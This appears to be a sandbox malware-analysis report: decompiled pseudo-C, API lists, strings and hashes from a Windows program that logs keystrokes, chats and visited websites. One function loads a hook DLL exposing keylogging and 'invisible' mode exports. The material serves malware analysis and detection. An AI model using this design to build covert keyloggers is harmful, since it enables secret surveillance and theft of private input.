#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DBF
#800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DCB

Part of subcall function 0042A486: __EH_prolog.LIBCMT ref: 0042A48B
Part of subcall function 0042A486: CoInitialize.OLE32(00000000), ref: 0042A497
Part of subcall function 0042A486: CoUninitialize.OLE32(?,?,00000000), ref: 0042A4A6

Strings

P.D, xrefs: 00427C70
bpk.dat, xrefs: 00427C85
bpkch.dat, xrefs: 00427CAD
websites.html, xrefs: 00427CD8
web.dat, xrefs: 00427C9B
chats.html, xrefs: 00427CEB
keystrokes.html, xrefs: 00427CC5

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#924$#858$H_prolog$InitializeUninitialize
String ID: P.D$bpk.dat$bpkch.dat$chats.html$keystrokes.html$web.dat$websites.html
API String ID: 1845883038-3825156867
Opcode ID: bfc51e78563170725a8be9a30a06eed13b4b40a3063c931c9a8cb600e42f7baf
Instruction ID: b3ed319e97b9e827fc72946500639c61b5c89e55fca48b337b27c2bfc678031f
Opcode Fuzzy Hash: bfc51e78563170725a8be9a30a06eed13b4b40a3063c931c9a8cb600e42f7baf
Instruction Fuzzy Hash: 6C419E71D0025AAADB01EBE5DD46BEEFFB8AF19304F54006EE41473282D77C5A09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C524, Relevance: 40.3, APIs: 7, Strings: 16, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040C524(void* __ecx) {
				intOrPtr _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t33;
				void* _t35;
				void* _t41;

				_t17 = E0043E4E0(0x43fda0, _t35);
				_push(__ecx);
				_t33 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x24)) != 0xffffffff) {
					MessageBeep(0);
					_push("Unknown error!");
					L0043DE26();
					_t17 =  *((intOrPtr*)(_t33 + 0x24));
					 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
					_t41 = _t17 - 0xb;
					if(_t41 > 0) {
						_t19 = _t17 - 0x1a;
						if(_t19 == 0) {
							_push("A sharing violation occurred.");
							goto L32;
						} else {
							_t20 = _t19 - 1;
							if(_t20 == 0) {
								_push("The filename association is\nincomplete or invalid.");
								goto L32;
							} else {
								_t21 = _t20 - 1;
								if(_t21 == 0) {
									_push("The DDE transaction could not\nbe completed because the request timed out.");
									goto L32;
								} else {
									_t22 = _t21 - 1;
									if(_t22 == 0) {
										_push("The DDE transaction failed.");
										goto L32;
									} else {
										_t23 = _t22 - 1;
										if(_t23 == 0) {
											_push("The DDE transaction could not\nbe completed because other DDE transactions\nwere being processed.");
											goto L32;
										} else {
											_t24 = _t23 - 1;
											if(_t24 == 0) {
												_push("There is no application associated\nwith the given filename extension.");
												goto L32;
											} else {
												_t17 = _t24 - 1;
												if(_t17 == 0) {
													_push("The specified dynamic-link library was not found.");
													goto L32;
												}
											}
										}
									}
								}
							}
						}
					} else {
						if(_t41 == 0) {
							_push("The .EXE file is invalid\n(non-Win32 .EXE or error in .EXE image).");
							goto L32;
						} else {
							if(_t17 == 0xfffffffd) {
								_push( *((intOrPtr*)(0x4552fc +  *(_t33 + 8) * 4)));
								_t17 = _t35 - 0x10;
								_push("%s action failed!");
								_push(_t17);
								L0043E174();
							} else {
								if(_t17 == 0xfffffffe) {
									_push("Failed to execute unknown action!");
									goto L32;
								} else {
									if(_t17 == 0) {
										_push("The operating system is out\nof memory or resources.");
										goto L32;
									} else {
										if(_t17 == 2) {
											_push("The specified file was not found.");
											goto L32;
										} else {
											if(_t17 == 3) {
												_push("The specified path was not found.");
												goto L32;
											} else {
												if(_t17 == 5) {
													_push("The operating system denied\naccess to the specified file.");
													goto L32;
												} else {
													if(_t17 == 8) {
														_push("There was not enough memory to complete the operation.");
														L32:
														_t17 = _t35 - 0x10;
														_push(_t17);
														L0043E174();
													}
												}
											}
										}
									}
								}
							}
						}
					}
					_push(0);
					_push(0x10);
					_push( *((intOrPtr*)(_t35 - 0x10)));
					L0043E16E();
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t17;
			}

0x0040c529
0x0040c52e
0x0040c530
0x0040c536
0x0040c53e
0x0040c544
0x0040c54c
0x0040c551
0x0040c554
0x0040c558
0x0040c55b
0x0040c5d9
0x0040c5dc
0x0040c61a
0x00000000
0x0040c5de
0x0040c5de
0x0040c5df
0x0040c613
0x00000000
0x0040c5e1
0x0040c5e1
0x0040c5e2
0x0040c60c
0x00000000
0x0040c5e4
0x0040c5e4
0x0040c5e5
0x0040c605
0x00000000
0x0040c5e7
0x0040c5e7
0x0040c5e8
0x0040c5fe
0x00000000
0x0040c5ea
0x0040c5ea
0x0040c5eb
0x0040c5f7
0x00000000
0x0040c5ed
0x0040c5ed
0x0040c5ee
0x0040c5f0
0x00000000
0x0040c5f0
0x0040c5ee
0x0040c5eb
0x0040c5e8
0x0040c5e5
0x0040c5e2
0x0040c5df
0x0040c55d
0x0040c55d
0x0040c5d2
0x00000000
0x0040c55f
0x0040c562
0x0040c5b8
0x0040c5bf
0x0040c5c2
0x0040c5c7
0x0040c5c8
0x0040c564
0x0040c567
0x0040c5ae
0x00000000
0x0040c569
0x0040c56b
0x0040c5a7
0x00000000
0x0040c56d
0x0040c570
0x0040c5a0
0x00000000
0x0040c572
0x0040c575
0x0040c599
0x00000000
0x0040c577
0x0040c57a
0x0040c58f
0x00000000
0x0040c57c
0x0040c57f
0x0040c585
0x0040c61f
0x0040c61f
0x0040c622
0x0040c623
0x0040c629
0x0040c57f
0x0040c57a
0x0040c575
0x0040c570
0x0040c56b
0x0040c567
0x0040c562
0x0040c55d
0x0040c62a
0x0040c62c
0x0040c62e
0x0040c631
0x0040c636
0x0040c63d
0x0040c63d
0x0040c646
0x0040c64e

APIs

__EH_prolog.LIBCMT ref: 0040C529
MessageBeep.USER32(00000000), ref: 0040C53E
#537.MFC42(Unknown error!), ref: 0040C54C
#2818.MFC42(?,%s action failed!,Unknown error!), ref: 0040C5C8
#2818.MFC42(?,A sharing violation occurred.,Unknown error!), ref: 0040C623
#1200.MFC42(?,00000010,00000000,Unknown error!), ref: 0040C631
#800.MFC42(?,00000010,00000000,Unknown error!), ref: 0040C63D

Strings

The operating system deniedaccess to the specified file., xrefs: 0040C58F
A sharing violation occurred., xrefs: 0040C61A
Failed to execute unknown action!, xrefs: 0040C5AE
The .EXE file is invalid(non-Win32 .EXE or error in .EXE image)., xrefs: 0040C5D2
The filename association isincomplete or invalid., xrefs: 0040C613
Unknown error!, xrefs: 0040C544
The DDE transaction failed., xrefs: 0040C605
The operating system is outof memory or resources., xrefs: 0040C5A7
%s action failed!, xrefs: 0040C5C2
There is no application associatedwith the given filename extension., xrefs: 0040C5F7
There was not enough memory to complete the operation., xrefs: 0040C585
The DDE transaction could notbe completed because other DDE transactionswere being processed., xrefs: 0040C5FE
The specified file was not found., xrefs: 0040C5A0
The specified dynamic-link library was not found., xrefs: 0040C5F0
The specified path was not found., xrefs: 0040C599
The DDE transaction could notbe completed because the request timed out., xrefs: 0040C60C

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2818$#1200#537#800BeepH_prologMessage
String ID: %s action failed!$A sharing violation occurred.$Failed to execute unknown action!$The .EXE file is invalid(non-Win32 .EXE or error in .EXE image).$The DDE transaction could notbe completed because other DDE transactionswere being processed.$The DDE transaction could notbe completed because the request timed out.$The DDE transaction failed.$The filename association isincomplete or invalid.$The operating system deniedaccess to the specified file.$The operating system is outof memory or resources.$The specified dynamic-link library was not found.$The specified file was not found.$The specified path was not found.$There is no application associatedwith the given filename extension.$There was not enough memory to complete the operation.$Unknown error!
API String ID: 3185299381-1074963315
Opcode ID: e32150de63c7717e32e6dd744d38a45304f1aa8703e5668f0a5b833e1b4ac76c
Instruction ID: 7097643f913a1da9438510457e980e1fd2dab88589d1732124d77c2ac86f96b5
Opcode Fuzzy Hash: e32150de63c7717e32e6dd744d38a45304f1aa8703e5668f0a5b833e1b4ac76c
Instruction Fuzzy Hash: 1B21C470544615F2CA348B944CCBB7A7210A7447D3F382F37B913B12D395BDAA06A10F

Uniqueness

Uniqueness Score: -1.00%

Function 0040E42B, Relevance: 36.3, APIs: 24, Instructions: 262
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040E42B(struct HFONT__* __ecx) {
				struct HBITMAP__* _t124;
				struct HBITMAP__* _t131;
				unsigned int _t132;
				signed int _t137;
				signed int _t139;
				struct HFONT__* _t144;
				intOrPtr _t148;
				intOrPtr _t152;
				signed int _t156;
				struct HFONT__* _t170;
				intOrPtr _t172;
				signed int _t185;
				signed int _t207;
				int _t221;
				int _t223;
				signed int _t228;
				int _t231;
				signed int _t232;
				signed int _t234;
				void* _t235;
				struct HFONT__* _t238;
				signed int _t243;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t249;

				_t124 = E0043E4E0(0x44012b, _t244);
				_t247 = _t246 - 0x7c;
				_t170 = __ecx;
				 *(_t244 - 0x2c) = __ecx;
				if( *((intOrPtr*)(__ecx + 0x68)) == 0) {
					GetClientRect( *(__ecx + 0x20), _t244 - 0x54);
					_t231 =  *((intOrPtr*)(_t244 - 0x48)) -  *((intOrPtr*)(_t244 - 0x50));
					_t221 =  *(_t244 - 0x4c) -  *(_t244 - 0x54);
					_push(_t170);
					 *(_t244 - 0x1c) = _t231;
					L0043E10E();
					 *(_t244 - 4) =  *(_t244 - 4) & 0x00000000;
					L0043E000();
					 *(_t244 - 4) = 1;
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~(_t244 - 0x88) &  *(_t244 - 0x84)));
					L0043DFFA();
					_t172 = _t170 + 0x64;
					L0043DD72();
					_t131 = CreateCompatibleBitmap( *(_t244 - 0x84), _t221, _t231);
					_push(_t131);
					L0043DD60();
					if(_t172 != 0) {
						_t172 =  *((intOrPtr*)(_t172 + 4));
					}
					_push(_t172);
					_push( *((intOrPtr*)(_t244 - 0x40)));
					L0043DD84();
					 *(_t244 - 0x34) = _t131;
					_t132 = GetSysColor(0xf);
					 *(_t244 - 0x28) = _t132 & 0x000000ff;
					 *(_t244 - 0x18) = _t132;
					 *(_t244 - 0x24) = _t132 & 0x000000ff;
					_t185 =  *(_t244 - 0x4c);
					 *(_t244 - 0x20) = _t132 >> 0x00000010 & 0x000000ff;
					asm("cdq");
					_t232 = 8;
					_t137 = (_t185 << 3) / _t232;
					 *(_t244 - 0x10) = _t137;
					asm("cdq");
					_t139 = _t221 / 0x80;
					_t234 = _t137 -  *(_t244 - 0x54);
					_t207 = 1;
					 *(_t244 - 0x14) = _t139;
					if(_t139 <= _t207) {
						 *(_t244 - 0x14) = _t207;
					}
					_push( *(_t244 - 0x18));
					_t223 = 0;
					_push( *(_t244 - 0x1c));
					_push(_t185 -  *(_t244 - 0x10));
					_push(0);
					_push( *(_t244 - 0x10));
					_push(_t244 - 0x44);
					E0040E6E1(_t185 -  *(_t244 - 0x10));
					_t187 =  *(_t244 - 0x10);
					_t249 = _t247 + 0x18;
					if(_t187 >  *(_t244 - 0x14)) {
						_t228 = _t234 * _t234;
						_t156 =  ~( *(_t244 - 0x14));
						 *(_t244 - 0x30) = _t156;
						 *(_t244 - 0x18) = _t234 - _t187;
						while(1) {
							 *(_t244 - 0x18) =  *(_t244 - 0x18) - _t156;
							 *(_t244 - 0x10) =  *(_t244 - 0x10) -  *(_t244 - 0x14);
							asm("cdq");
							asm("cdq");
							_t243 =  *(_t244 - 0x10);
							asm("cdq");
							_t187 = 0 << 0x00000008 |  *(_t244 - 0x28) -  *(_t244 - 0x18) *  *(_t244 - 0x18) *  *(_t244 - 0x28) / _t228 & 0x000000ff;
							_push(0 << 8);
							_push( *(_t244 - 0x1c));
							_push( *(_t244 - 0x14));
							_push(0);
							_push(_t243);
							_push(_t244 - 0x44);
							E0040E6E1(0 << 0x00000008 |  *(_t244 - 0x28) -  *(_t244 - 0x18) *  *(_t244 - 0x18) *  *(_t244 - 0x28) / _t228 & 0x000000ff);
							_t249 = _t249 + 0x18;
							if(_t243 <=  *(_t244 - 0x14)) {
								break;
							}
							_t156 =  *(_t244 - 0x30);
						}
						_t223 = 0;
					}
					_push(_t223);
					_push( *(_t244 - 0x1c));
					_push( *(_t244 - 0x10));
					_push(_t223);
					_push(_t223);
					_push(_t244 - 0x44);
					E0040E6E1(_t187);
					_t144 =  *(_t244 - 0x2c);
					_t235 = _t144 + 0x5c;
					if(_t235 == _t223 ||  *((intOrPtr*)(_t235 + 4)) == _t223) {
						_t144 = CreateFontA(0x12, _t223, _t223, _t223, 0x2bc, _t223, _t223, _t223, _t223, _t223, _t223, _t223, 0x30,  *(_t144 + 0x40));
						_push(_t144);
						L0043DD60();
					}
					L0043E108();
					 *(_t244 - 0x4c) =  *(_t244 - 0x4c) - 5;
					 *(_t244 - 0x30) = _t144;
					L0043E024();
					L0043E246();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect(_t244 - 0x64, 1, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t238 =  *(_t244 - 0x2c);
					_t148 =  *((intOrPtr*)(_t238 + 0x6c));
					 *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x44)) + 0x70))(_t148,  *((intOrPtr*)(_t148 - 8)), _t244 - 0x74, 0x26, GetSysColor(0x14), 1, _t235);
					L0043E246();
					_t152 =  *((intOrPtr*)(_t238 + 0x6c));
					 *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x44)) + 0x70))(_t152,  *((intOrPtr*)(_t152 - 8)), _t244 - 0x54, 0x26, GetSysColor(0x10));
					_push( *(_t244 - 0x30));
					L0043E108();
					_t124 =  *(_t244 - 0x34);
					if(_t124 != 0) {
						_t124 =  *(_t124 + 4);
					}
					_push(_t124);
					_push( *((intOrPtr*)(_t244 - 0x40)));
					L0043DD84();
					 *(_t244 - 4) =  *(_t244 - 4) & 0x00000000;
					L0043DFF4();
					 *(_t244 - 4) =  *(_t244 - 4) | 0xffffffff;
					L0043E102();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t244 - 0xc));
				return _t124;
			}

0x0040e430
0x0040e435
0x0040e439
0x0040e43b
0x0040e442
0x0040e451
0x0040e45d
0x0040e460
0x0040e463
0x0040e46a
0x0040e46d
0x0040e472
0x0040e479
0x0040e484
0x0040e48a
0x0040e499
0x0040e49d
0x0040e4a2
0x0040e4a7
0x0040e4b4
0x0040e4ba
0x0040e4bd
0x0040e4c4
0x0040e4c6
0x0040e4c6
0x0040e4c9
0x0040e4ca
0x0040e4cd
0x0040e4da
0x0040e4dd
0x0040e4e2
0x0040e4e9
0x0040e4f5
0x0040e4f8
0x0040e4fb
0x0040e505
0x0040e506
0x0040e507
0x0040e50b
0x0040e517
0x0040e518
0x0040e51a
0x0040e51d
0x0040e520
0x0040e523
0x0040e525
0x0040e525
0x0040e528
0x0040e52e
0x0040e533
0x0040e536
0x0040e537
0x0040e538
0x0040e53b
0x0040e53c
0x0040e541
0x0040e544
0x0040e54a
0x0040e551
0x0040e554
0x0040e558
0x0040e55b
0x0040e563
0x0040e563
0x0040e56c
0x0040e57a
0x0040e58a
0x0040e59a
0x0040e59d
0x0040e5ab
0x0040e5b0
0x0040e5b1
0x0040e5b4
0x0040e5b7
0x0040e5b9
0x0040e5ba
0x0040e5bb
0x0040e5c0
0x0040e5c6
0x00000000
0x00000000
0x0040e560
0x0040e560
0x0040e5c8
0x0040e5c8
0x0040e5ca
0x0040e5ce
0x0040e5d1
0x0040e5d4
0x0040e5d5
0x0040e5d6
0x0040e5d7
0x0040e5dc
0x0040e5e2
0x0040e5e7
0x0040e604
0x0040e60a
0x0040e60d
0x0040e60d
0x0040e616
0x0040e61b
0x0040e624
0x0040e627
0x0040e634
0x0040e63f
0x0040e640
0x0040e641
0x0040e64a
0x0040e64b
0x0040e657
0x0040e658
0x0040e659
0x0040e65a
0x0040e65b
0x0040e664
0x0040e672
0x0040e67d
0x0040e682
0x0040e696
0x0040e699
0x0040e69f
0x0040e6a4
0x0040e6ab
0x0040e6ad
0x0040e6ad
0x0040e6b0
0x0040e6b1
0x0040e6b4
0x0040e6b9
0x0040e6c0
0x0040e6c5
0x0040e6cf
0x0040e6cf
0x0040e6d8
0x0040e6e0

APIs

__EH_prolog.LIBCMT ref: 0040E430
GetClientRect.USER32 ref: 0040E451
#562.MFC42 ref: 0040E46D
#323.MFC42 ref: 0040E479
CreateCompatibleDC.GDI32(?), ref: 0040E493
#1640.MFC42(00000000), ref: 0040E49D
#2414.MFC42(00000000), ref: 0040E4A7
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040E4B4
#1641.MFC42(00000000), ref: 0040E4BD
#5785.MFC42(?,?,00000000), ref: 0040E4CD
GetSysColor.USER32(0000000F), ref: 0040E4DD

Part of subcall function 0040E6E1: __EH_prolog.LIBCMT ref: 0040E6E6
Part of subcall function 0040E6E1: #283.MFC42(?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E6F5
Part of subcall function 0040E6E1: #5788.MFC42(?,?,00000000,?,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E707
Part of subcall function 0040E6E1: PatBlt.GDI32(00000000,?,?,?,?,00F00021), ref: 0040E722
Part of subcall function 0040E6E1: #5788.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E72B
Part of subcall function 0040E6E1: #2414.MFC42(00000000,?,?,0040E541,?,?,00000000,?,?,?,?,00000000), ref: 0040E741

CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000030,?), ref: 0040E604
#1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E60D
#5788.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E616
#5875.MFC42(00000001,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E627
GetSysColor.USER32(00000014), ref: 0040E62E
#6172.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E634
OffsetRect.USER32(?,00000001,00000001), ref: 0040E64B
GetSysColor.USER32(00000010), ref: 0040E677
#6172.MFC42(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E67D
#5788.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E69F
#5785.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6B4
#640.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6C0
#816.MFC42(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E6CF

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5788$ColorCreate$#1641#2414#5785#6172CompatibleH_prologRect$#1640#283#323#562#5875#640#816BitmapClientFontOffset
String ID:
API String ID: 488967498-0
Opcode ID: b89e63d6abeafeb36743849c66ca51e738dd1c4487331a27789d3df08a7090f3
Instruction ID: 00b987ec6506c25ccf08960c55b572c892d5960c241a1689b0548be05c3f8ba0
Opcode Fuzzy Hash: b89e63d6abeafeb36743849c66ca51e738dd1c4487331a27789d3df08a7090f3
Instruction Fuzzy Hash: 2E916972D001199FCF14DFEACD85AEEBBB9EF48304F10446AE501B7291DA756E05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421274, Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 113
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00421274(void* __ecx, void* __eflags) {
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				_Unknown_base(*)()* _t35;
				intOrPtr* _t39;
				signed int _t42;
				void* _t50;
				intOrPtr* _t51;
				void* _t56;
				void* _t64;

				E0043E4E0(0x442134, _t56);
				_t42 = 0;
				_t50 = __ecx;
				E0042A660(_t56 - 0x110, 2, 0);
				if( *((intOrPtr*)(_t56 + 8)) == 0) {
					_t51 =  *((intOrPtr*)(__ecx + 0x2750));
					if(_t51 != 0) {
						 *_t51(0, 0, 0);
					}
					L18:
					_push(1);
					_pop(0);
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
					return 0;
				}
				_t64 =  *0x455ac0 - _t42; // 0x10000000
				if(_t64 != 0) {
					goto L18;
				}
				_t28 = LoadLibraryA(_t56 - 0x110);
				 *0x455ac0 = _t28;
				if(_t28 == 0) {
					L15:
					goto L19;
				}
				_t29 = GetProcAddress(_t28, "SetHook");
				 *(_t50 + 0x2750) = _t29;
				if(_t29 == 0) {
					goto L15;
				}
				_t30 = GetProcAddress( *0x455ac0, "EnableSpecialKeysLogging");
				 *(_t50 + 0x2760) = _t30;
				if(_t30 == 0) {
					goto L15;
				}
				_t31 = GetProcAddress( *0x455ac0, "DLL_GetProjectVersion");
				 *(_t50 + 0x2754) = _t31;
				if(_t31 == 0) {
					goto L15;
				}
				_t32 = GetProcAddress( *0x455ac0, "EnablePreHandle");
				 *(_t50 + 0x2758) = _t32;
				if(_t32 == 0) {
					goto L15;
				}
				_t33 = GetProcAddress( *0x455ac0, "EnableNTInvisible");
				 *(_t50 + 0x2768) = _t33;
				if(_t33 == 0) {
					goto L15;
				}
				_t34 = GetProcAddress( *0x455ac0, "EnableDiaryTracking");
				 *(_t50 + 0x84) = _t34;
				if(_t34 == 0) {
					goto L15;
				}
				_t35 = GetProcAddress( *0x455ac0, "EnableAltInterception");
				 *(_t50 + 0x275c) = _t35;
				if(_t35 == 0) {
					goto L15;
				}
				if( *(_t50 + 0x2754)() == 0xc9) {
					if(_t50 != 0) {
						_t42 =  *((intOrPtr*)(_t50 + 0x20));
					}
					_push(_t42);
					_push( *0x455ac0);
					_push(1);
					if( *(_t50 + 0x2750)() != 0) {
						goto L18;
					} else {
						goto L15;
					}
				}
				_t39 = E00429029(_t56 + 8, 0xe044);
				_push(0);
				_push(0x10);
				_push( *_t39);
				 *(_t56 - 4) = 0;
				L0043E16E();
				 *(_t56 - 4) =  *(_t56 - 4) | 0xffffffff;
				L0043DD36();
				goto L15;
			}

0x00421279
0x00421286
0x00421292
0x00421295
0x004212a0
0x004213d9
0x004213e1
0x004213e6
0x004213e6
0x004213e8
0x004213e8
0x004213ea
0x004213eb
0x004213f1
0x004213f9
0x004213f9
0x004212a6
0x004212ac
0x00000000
0x00000000
0x004212b9
0x004212c1
0x004212c6
0x004213d5
0x00000000
0x004213d5
0x004212d8
0x004212dc
0x004212e2
0x00000000
0x00000000
0x004212f3
0x004212f7
0x004212fd
0x00000000
0x00000000
0x0042130e
0x00421312
0x00421318
0x00000000
0x00000000
0x00421329
0x0042132d
0x00421333
0x00000000
0x00000000
0x00421344
0x00421348
0x0042134e
0x00000000
0x00000000
0x0042135f
0x00421363
0x00421369
0x00000000
0x00000000
0x00421376
0x0042137a
0x00421380
0x00000000
0x00000000
0x0042138d
0x004213bd
0x004213bf
0x004213bf
0x004213c2
0x004213c3
0x004213c9
0x004213d3
0x00000000
0x00000000
0x00000000
0x00000000
0x004213d3
0x00421398
0x004213a1
0x004213a2
0x004213a4
0x004213a5
0x004213a8
0x004213ad
0x004213b4
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00421279

Part of subcall function 0042A660: GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
Part of subcall function 0042A660: lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
Part of subcall function 0042A660: lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

LoadLibraryA.KERNEL32(?,00000000,?,00000000), ref: 004212B9
GetProcAddress.KERNEL32(00000000,SetHook), ref: 004212D8
GetProcAddress.KERNEL32(EnableSpecialKeysLogging), ref: 004212F3
GetProcAddress.KERNEL32(DLL_GetProjectVersion), ref: 0042130E
GetProcAddress.KERNEL32(EnablePreHandle), ref: 00421329
GetProcAddress.KERNEL32(EnableNTInvisible), ref: 00421344
GetProcAddress.KERNEL32(EnableDiaryTracking), ref: 0042135F
GetProcAddress.KERNEL32(EnableAltInterception), ref: 00421376

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
